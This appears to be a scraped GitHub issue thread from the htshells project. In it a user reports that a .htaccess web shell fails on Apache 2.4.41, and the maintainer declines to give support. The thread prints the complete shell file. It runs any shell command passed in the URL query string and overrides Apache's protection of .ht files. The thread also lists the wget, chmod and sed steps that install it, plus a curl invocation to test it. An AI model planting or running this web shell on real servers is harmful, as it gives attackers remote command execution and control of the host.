Still Viable on apache 2.4.41? about htshells HOT 4 CLOSED

htshells should work on Apache2. Did you uncomment the line per the comments in the file?

from htshells.

To set this up:

1. I installed an Ubuntu 20.04 (server). apt-get update and apt-get dist-upgrade
2. apt-get install apache2
3. a2enmod cgi
4. apache2ctl restart
5. confirm we're in working order:

   ubuntu@ubuntu2004:~$ curl --silent 127.0.0.1 | head
   
   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
     <!--
       Modified from the Debian original for Ubuntu
       Last updated: 2016-11-16
       See: https://launchpad.net/bugs/1288690
     -->
     <head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   

6. wget -O /var/www/html/.htaccess https://raw.githubusercontent.com/wireghoul/htshells/master/sh ell/mod_cgi.shell.bash.htaccess
7. chmod +x /var/www/html/.htaccess
8. sed -i 's/# Require all granted/ Require all granted/' /var/www/html/.htaccess
9. Double check we're all good:

   ubuntu@ubuntu2004:~$ cat /var/www/html/.htaccess
   #!/bin/sh
   # Self contained .htaccess web shell - Part of the htshell project
   # Written by Wireghoul - http://www.justanotherhacker.com
   # IMPORTANT: Needs chmod +x to run
   # Run commands via http://url/.htaccess?cmd (ie: http://url/.htaccess?uname -a)
   
   # Big shout out to the rosetta code website which provided the example below!
   # This is considered a line spanning comment in apache and not by shell #winning \
   echo -en "Content-Type: text/plain\r\n\r\n";cmd=$(echo $QUERY_STRING | sed -e's/+/ /g' -e's/%20/ /g');echo "\$ $cmd";$cmd 2>&1;exit
   # The exit ensures we never reach the following lines which would break the shell parser
   
   # Override default deny rule to make .htaccess file accessible over web
   <Files ~ "^\.ht">
   # Uncomment the line below for Apache2.4 and newer
     Require all granted
       Order allow,deny
       Allow from all
   </Files>
   
   # Enable  CGI
   Options +ExecCGI
   
   #Make apache treat .htaccess as a cgi file
   AddHandler cgi-script .htaccess
   

10. apache2ctl restart (just to be certain everything is correct)
11. Give it a go:

curl --silent "http://127.0.0.1/.htaccess?whoami" | head
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>

12. Logs

ubuntu@ubuntu2004:~$ tail -n 1 /var/log/apache2/error.log
[Sat Jan 08 15:24:06.423878 2022] [authz_core:error] [pid 3034:tid 139833246701312] [client 127.0.0.1:46224] AH01630: client denied by server configuration: /var/www/html/.htaccess

All changes to server are listed here. However, for sake of consistency, here's the only enabled site config:

<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

Thus, it seems the default config is blocking this in some way shape or form. I spent some time trying to debug, but didn't make any progress.

from htshells.

any updates?

from htshells.

Sorry, there is no unpaid tech support for this project. Between this talk (https://youtu.be/p1aCTBZrIOw) the Apache documentation and your server logs you should be able to figure it out.

In most real world scenarios I've seen you usually only get one shot at generating the correct htaccess file for the server config in use. Or you can write a specific exploit for a known configuration. Tbh I'd rather not see htshells as a payload function in metasploit, as I fear that will just generate a large number of support requests from users who had their exploit fail and use GitHub to demand answers.

from htshells.